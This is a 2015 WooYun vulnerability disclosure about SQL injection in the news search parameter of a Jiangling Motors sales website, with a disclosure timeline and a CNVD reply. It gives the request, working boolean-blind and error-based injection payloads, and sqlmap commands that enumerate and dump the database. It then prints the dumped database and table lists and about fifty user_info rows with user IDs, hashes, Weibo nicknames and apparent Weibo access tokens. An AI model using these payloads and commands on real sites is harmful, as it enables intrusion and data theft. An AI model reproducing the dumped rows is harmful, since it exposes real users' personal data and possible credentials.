漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0134404
漏洞标题:江铃汽车销售有限公司某站存在SQL注射漏洞
相关厂商:cncert国家互联网应急中心
漏洞作者: 毛毛虫
提交时间:2015-08-19 22:30
修复时间:2015-10-05 17:40
公开时间:2015-10-05 17:40
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-31: 细节向核心白帽子及相关领域专家公开
2015-09-10: 细节向普通白帽子公开
2015-09-20: 细节向实习白帽子公开
2015-10-05: 细节向公众公开
简要描述:
江铃汽车销售有限公司
地 址:江西省南昌市江铃西四路3号
邮 编:330001
网 址:http://www.myjmc.com.cn
客户免费热线:800-869-1099 800-869-1099
详细说明:
1.<code区域>
GET /index.php/news/search?keywords=999999 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/index.php/news/search?keywords=111
Cookie: PHPSESSID=6cpee61hip116h8dsbsi29h903; Hm_lvt_069e776b1495e9b50007090e3fbb17ba=1439650601; Hm_lpvt_069e776b1495e9b50007090e3fbb17ba=1439650608; _5t_trace_sid=1b4d4f417446e8093c08ed5a740a3a39; _5t_trace_tms=1
Connection: keep-alive
2.注入点keywords和payload(GET型)
Parameter: keywords (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: keywords=-4081%' OR 8461=8461 AND '%'='
Vector: OR [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: keywords=111%' AND (SELECT 4165 FROM(SELECT COUNT(*),CONCAT(0x716b7
87a71,(SELECT (ELT(4165=4165,1))),0x71626a7171,FLOOR(RAND(0)*2))x FROM INFORMATI
ON_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]
',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARAC
TER_SETS GROUP BY x)a)
---
3.服务器信息
DBMS is MySQL 5.0
web application technology: PHP 5.3.3, Nginx
4.运行脚本
sqlmap.py -u "http://**.**.**.**/index.php/news/search?keywords=111" --risk=3 -v 3 --dbs(获取数据库名称)
sqlmap.py -u "http://**.**.**.**/index.php/news/search?keywords=111" --risk=3 -v 3 --dbs -D jiangling --tables(举例说明:获取数据库jiangliang的表明)
sqlmap.py -u "http://**.**.**.**/index.php/news/search?keywords=111" --risk=3 -v 3 --dbs -D jiangling -T user_info --dump(举例说明:脱裤获取表user_info内容)
漏洞证明:
1.数据库名称
available databases [7]:
[*] information_schema
[*] jiangling
[*] leibotech
[*] mysql
[*] repldb
[*] test
[*] yuhu
2.举例列举数据库jiangling的表
Database: jiangling
[80 tables]
+--------------------------+
| Admin |
| Book |
| Book_copy |
| Book_copy1 |
| Category |
| Dealer |
| Dealer_co |
| IP |
| Owners |
| Service |
| ServiceMain |
| SurveryView |
| SurveyUsers |
| TestDrive |
| Users |
| a_ditangxing1_baoming |
| a_ditangxing1_photo |
| a_ditangxing1_stat |
| a_ditangxing_baoming |
| a_ditangxing_photo |
| a_ditangxing_stat |
| a_duanwu_contribute |
| a_duanwu_survey |
| a_jmc2015_360che |
| a_kairui |
| a_kairui_count |
| a_kuirui_ip |
| a_quanshun |
| a_quanshun_20150323 |
| a_quanshun_key |
| a_sitekvs |
| a_stat |
| a_yuhu |
| a_yuhu_count |
| a_yuhu_ip |
| a_yuhu_join |
| admin_info |
| b_quanshun |
| b_quanshun_dealer |
| b_quanshun_dealer_copy |
| b_quanshun_key |
| b_yusheng |
| b_yusheng_dealer |
| b_yusheng_key |
| b_yusheng_main |
| city |
| dealermain |
| ford_aboutweb |
| ford_activity |
| ford_cmscp_manager |
| ford_cmscp_role |
| ford_cmscp_setting |
| ford_log |
| ford_saletips |
| ford_training |
| ford_usehelp |
| ford_user |
| ford_user_import_history |
| ford_user_score_change |
| jl_yh |
| news |
| newsmain |
| nusheng_contribute |
| nusheng_survey |
| province |
| qs_code |
| survey |
| survey_list |
| user_info |
| vote_info |
| works_info |
| xq_ad |
| xq_donation |
| xq_friend |
| xq_love |
| xq_loveyear |
| xq_news |
| xq_newscate |
| xq_options |
| xq_pages |
+--------------------------+
3.举例说明表user_info脱裤的部分信息
| 44600 | 00CC2CF77C89069DBE734B208F261388 | 0 | qyl55bbn | 142105
5083 | http://**.**.**.**/2677517061/180/5627539585/1
| weibo | 2.00DVaMvCUPZc3C0764dbdb1dqwnOGC |
| 34697 | 00CEB1A984860197A3F5D16CED1527DA | 0 | 落雪清薇 | 14
21055116 | http://**.**.**.**/1231772813/180/5684400018/1
| weibo | 2.0084532BUPZc3C63c814ebe1vuEgIE |
| 48292 | 00D0712E7ADA2B30DEA6D5F0D524375A | 0 | 貌貌518 | 1421
055135 | http://**.**.**.**/1231200011/180/5619548922/1
| weibo | 2.00h3z_2BUPZc3C6d060ec39eOwmndE |
| 14163 | 00D3A7EC91E30E96F573722491A826B9 | 1 | 大白杨和 | 14
21055153 | http://**.**.**.**/1231278724/180/5621579810/0
| weibo | 2.00Qq_12BUPZc3Cc25d722d008a6fMC |
| 27600 | 00D4F9E014A2C2B2B8F4EF625AA48D85 | 1 | 捻草一笑 | 14
21055171 | http://**.**.**.**/1230965545/180/5630252849/0
| weibo | 2.00z3A_2BUPZc3C777fc26e650mEOVb |
| 46113 | 00D597602768FC702C2EE47A89B63501 | 1 | 丹青一姐aos | 14
21055200 | http://**.**.**.**/1230995371/180/5616902606/0
| weibo | 2.00DII_2BUPZc3C76023fd8feRjRWiC |
| 66695 | 00D705462E6362519098848F51DBA102 | 0 | samiyuan | 142105
5216 | http://**.**.**.**/2703514931/180/5628925340/1
| weibo | 2.00XjfxwCUPZc3C3591a9ac3atsnWjD |
| 69118 | 00D746EB9124CC05B78FCE5C21CD3EDA | 0 | 摘技巧大星 | 1
421055236 | http://**.**.**.**/3209205937/180/40012797901/1
| weibo | 2.00FEVLVDUPZc3Cd89858d257rE8RbC |
| 19262 | 00D75A28C702E15B65CA85EFA575A64E | 1 | 拟音符 | 142
1055254 | http://**.**.**.**/1231299095/180/5625938880/0
| weibo | 2.00pI612BUPZc3C152f8ec868r_sQsD |
| 26774 | 00D78F457D8D68979D2C2432AE36B638 | 0 | 千里走单骑sz | 1
421055275 | http://**.**.**.**/1231288407/180/5626080311/1
| weibo | 2.0083312BUPZc3C2f30e8205e0KOcIv |
| 36978 | 00D7FBF42F1332C56B2E733F43B48F67 | 1 | 鱼sam茄子 | 142
1055295 | http://**.**.**.**/1231279524/180/5621651031/0
| weibo | 2.00KD112BUPZc3Cd36ddbce21b9xQZB |
| 70925 | 00DBEDDEDE5C301269A012160B557756 | 1 | 八戒我要吓你了 |
1421055318 | http://**.**.**.**/1231283335/180/5622392271/0
| weibo | 2.00dC212BUPZc3Cfecc078762oBdlGD |
| 31296 | 00DDE8D2C8D6527EE196073131C3BAD4 | 1 | tanwensmcs | 142105
5335 | http://**.**.**.**/5068402305/180/5689680045/0
| weibo | 2.00RyUAXFUPZc3C702fee3728IhLkpB |
| 66350 | 00DE415B4A097D954FD507B2C7160E37 | 1 | 爱你久久52013145 | 14
21055354 | http://**.**.**.**/2665181531/180/5626794959/0
| weibo | 2.00t9p3uCUPZc3Cf9f2e1a708UZeSaC |
| 47508 | 00DF2C426BA1F4E137EE0A4134429D80 | 0 | 服园爱因素 | 1
421055371 | http://**.**.**.**/3210305113/180/40012725227/1
| weibo | 2.00jAHQVDUPZc3C1b1aac747e8OsiUE |
| 15579 | 00E489601F7FE334E5DF610C86BEDBBD | 0 | Gregliug | 142105
5391 | http://**.**.**.**/1230995043/180/5620048480/1
| weibo | 2.00lCI_2BUPZc3C3ec4e81f90tFSZ1C |
| 27471 | 00E683A3ED98FE297A034DBAB505BF26 | 0 | 头文字占 | 14
21055415 | http://**.**.**.**/1231926650/180/5684505066/1
| weibo | 2.00g5C42BUPZc3C69affb76acZadptD |
| 44271 | 00E7EA323E9A81A917C41FCA94D312AC | 1 | hjtytyuiuiu98 | 142105
5432 | http://**.**.**.**/2677604383/180/5627402181/0
| weibo | 2.00TNxMvCUPZc3C89f47e38e4YYrZ7B |
| 13471 | 00EBABBFE8A79F1DC22B112EA29D23DC | 0 | jamesysu | 142105
5454 | http://**.**.**.**/1231205303/180/5620920892/1
| weibo | 2.00DkA12BUPZc3C80892d6088U_a1uD |
| 56055 | 00EDB5F6E27921FC12DC34984FC03554 | 0 | 晨之阳都 | 14
21055471 | http://**.**.**.**/1230976123/180/5619635567/1
| weibo | 2.00bHD_2BUPZc3C44e2ee5303EH2sTE |
| 25542 | 00EE6C07D31F506F29C694986C1BF91C | 1 | 老陕-8023 | 1421
055491 | http://**.**.**.**/1230978540/180/5619108342/0
| weibo | 2.00akD_2BUPZc3Ceab218a0a1NZLiGC |
| 59019 | 00F00C78A6683C8AC5D3AD72603641AF | 0 | 嘉壕de故事hp | 14
21055516 | http://**.**.**.**/3184193573/180/40010350982/1
| weibo | 2.00rMYUTDUPZc3Cb96e549ad6BWPugB |
| 21925 | 00F04B144B0E483341F41FF07F06C0E7 | 1 | 犰狳潇潇 | 14
21055536 | http://**.**.**.**/1230948417/180/5619165359/0
| weibo | 2.00juvS2BUPZc3C2d8e3c58a10Qo7Ow |
| 19987 | 00F058448AC1A11694822694C136370C | 1 | 黑暗中非黑色眼睛
| 1421055556 | http://**.**.**.**/1230948165/180/5618464280/0
| weibo | 2.00fqvS2BUPZc3C6bc30f0ef1FRmYQC |
| 39635 | 00F31FAC4CD3EAC6E060F9CF23465833 | 1 | 两人三人多人 |
1421055577 | http://**.**.**.**/2682648241/180/5627710423/0
| weibo | 2.00B3HYvCUPZc3Cfb06df82880YGYQ8 |
| 61046 | 00F3EB182008AACCC723D9B4FDD8390B | 0 | 晕醉生梦死 | 1
421055595 | http://**.**.**.**/2694607683/180/5628518477/1
| weibo | 2.00PYS3wCUPZc3Cddac9f4b17TwV6lB |
| 47472 | 00F4DD0933805AE9BF8F3F3AA66BBCDE | 0 | 汐汐2002rpj | 1421
055620 | http://**.**.**.**/3180309813/180/40010160239/1
| weibo | 2.00ZrPOTDUPZc3C76bc0502632hroTC |
| 39117 | 00F6728322A98A83D1EF9D455C5CC13A | 0 | 星星fg | 1421
055639 | http://**.**.**.**/1231300110/180/5625971353/1
| weibo | 2.00M6612BUPZc3C5edb41e91eY5I8dD |
| 23183 | 00F692AB083EEC6F892E8C6A5A06CEAA | 1 | 别让我飞-rbl | 14
21055661 | http://**.**.**.**/3184161703/180/40010327999/0
| weibo | 2.00pu6UTDUPZc3Ccd9cecc6620H1osv |
| 61176 | 00F78A5B1DBD254E6F057E0017902D28 | 1 | auykmi7 | 142105
5681 | http://**.**.**.**/2819566883/180/5639681154/0
| weibo | 2.00NJcoEDUPZc3Cf2f666a566KvjSeD |
| 49932 | 00F7ECD783D82610A229258412A034DC | 0 | 军绿BOY | 1421
055699 | http://**.**.**.**/2698301491/180/5628772519/1
| weibo | 2.00nTnbwCUPZc3C8ad393c37ciq1c9D |
| 49083 | 00FA5B7698624F5049AA06077E37D0ED | 0 | 黄旗山峰 | 14
21055733 | http://**.**.**.**/2667274813/180/5626862678/1
| weibo | 2.00VBcVuCUPZc3Cfbad2190d1FhMqxB |
| 13272 | 00FAA555D82454BE280B561F9E5D0F02 | 0 | 爱佐偶咯 | 14
21055751 | http://**.**.**.**/1230963770/180/5618561284/1
| weibo | 2.003uzS2BUPZc3C4749bfefff8rl2QC |
| 41825 | 00FB02AF5BD58A0CE5D5C763B4214C29 | 1 | 我是懒懒的小调子
| 1421055782 | http://**.**.**.**/1231935650/180/5685636732/0
| weibo | 2.00qjE42BUPZc3C34cbb92570FH2IrB |
| 42923 | 00FB2A8A302206A9F86AD5EB59B3FEAD | 1 | 一厢酒暖 | 14
21055797 | http://**.**.**.**/1230986880/180/5620118577/0
| weibo | 2.00GvF_2BUPZc3Ce9c7b11868rELIzD |
| 41536 | 00FDD51F1EB72F7778702CDA541CC1F0 | 1 | 当年喜那些八月 |
1421055818 | http://**.**.**.**/3206251877/180/40011911857/0
| weibo | 2.00xZGzUDUPZc3Ca8d28b4d8aySzARC |
| 38150 | 00FE1976A6BABCBFD21A139EE8505564 | 1 | 蔷微紫陌 | 14
21055849 | http://**.**.**.**/2674055161/180/5627213026/0
| weibo | 2.00xtDyuCUPZc3C120990ffc1_bJdoC |
| 66269 | 00FEBCF8B55D260491A8F27A817B30CA | 0 | 天山肥人 | 14
21055865 | http://**.**.**.**/1231208270/180/5620998072/1
| weibo | 2.00uVB12BUPZc3Ca3109db4f3h__UID |
| 42841 | 00FF9412C9644FAF13A8BDEE6E70FAF7 | 1 | 老婆几时有2 | 1
421055885 | http://**.**.**.**/2723420353/180/5630758842/0
| weibo | 2.00jCM_yCUPZc3C359ba919fcqLq9WD |
| 55422 | 01021F7648D4CD9B9560480989545C8C | 1 | 偶不是懒鬼 | 1
421055906 | http://**.**.**.**/2678693511/180/5627461676/0
| weibo | 2.00DYWRvCUPZc3C09bf99a32a0OfjEl |
| 28345 | 010333DA6C6FB77F70CF40EC1D6EB966 | 0 | 一个不读书的人 |
1421055924 | http://**.**.**.**/1230953910/180/5619347697/1
| weibo | 2.0012xS2BUPZc3Cf52c4bc133JMvSgE |
| 40535 | 0103648EF7B72CE285DEA2E4CD1EC45A | 1 | 此人刘惠佳td | 1
421055960 | http://**.**.**.**/3179275827/180/40010116105/0
| weibo | 2.004suJTDUPZc3Cf75a8eb7e9QxQQqB |
| 7952 | 0103FF7EA23E6B9EA25190B01EF61F72 | 0 | 黎叔我很高兴 |
1421055981 | http://**.**.**.**/1231286290/180/5622876139/1
| weibo | 2.00So212BUPZc3C00ef457cff0qzb17 |
| 51465 | 01044F9CB35EC82E6873134DDED47E52 | 0 | 陈年老百干 | 1
421055999 | http://**.**.**.**/1230959941/180/5619632357/1
| weibo | 2.00buyS2BUPZc3C4c16e37c892lUwbD |
| 45567 | 010466E80701217F0E80BC5051DE4F9D | 1 | 许诺言66 | 142
1056020 | http://**.**.**.**/2687704523/180/5628059403/0
| weibo | 2.00xi1tvCUPZc3Cbde1156e02tzxxZD |
| 53002 | 0105056FF5F5E15ECC73AB5C31AF666C | 0 | 爱宇冰舞上海ccew |
1421056042 | http://**.**.**.**/3178730883/180/40010092570/1
| weibo | 2.00xGdHTDUPZc3C56ab5a7a71sOSi2E |
| 56856 | 010567DAA9061C7AF3BD45E546CB5197 | 1 | 张恩群 | 142
1056073 | http://**.**.**.**/1231086027/180/5619932394/0
| weibo | 2.00PiV_2BUPZc3Ca94b039732j5gDQB |
| 65162 | 0106149DF7F957D2E8DCE6EF16A42BCA | 1 | chesheng2007 | 142105
6091 | http://**.**.**.**/2721729473/180/5630382784/0
| weibo | 2.00TKGMyCUPZc3C9f2dcfa5409TpvNB |
| 29165 | 01063F1C3EAFBCCD0E321579990A4EA0 | 1 | 莲花山上一条龙 |
1421056112 | http://**.**.**.**/2723863643/180/5630898189/0
| weibo | 2.00Z3D2yCUPZc3Cfb99b233c50lIW2F |
| 38349 | 0106DB7ABF5B306B33F546339BEE53FB | 1 | 美美331 | 1421
056130 | http://**.**.**.**/1230979010/180/5619752462/0
| weibo | 2.00KsD_2BUPZc3C687c2973300sP1iP |
| 70051 | 0106FE0DDB669D79B38CA161F2512676 | 0 | 秦岭山下放牛娃 |
1421056149 | http://**.**.**.**/1230960861/180/5620377751/1
| weibo | 2.008JzS2BUPZc3C2dbb9630e4H_UAXE |
| 24712 | 0107AC287F151C091F841F69EA78E2D0 | 1 | gjyggp | 142105
6172 | http://**.**.**.**/2681165271/180/5627721004/0
| weibo | 2.00JZt8vCUPZc3C4aaa704101gMw6AD |
修复方案:
过滤注入点
版权声明:转载请注明来源 毛毛虫@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-08-21 17:39
厂商回复:
CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。
最新状态:
暂无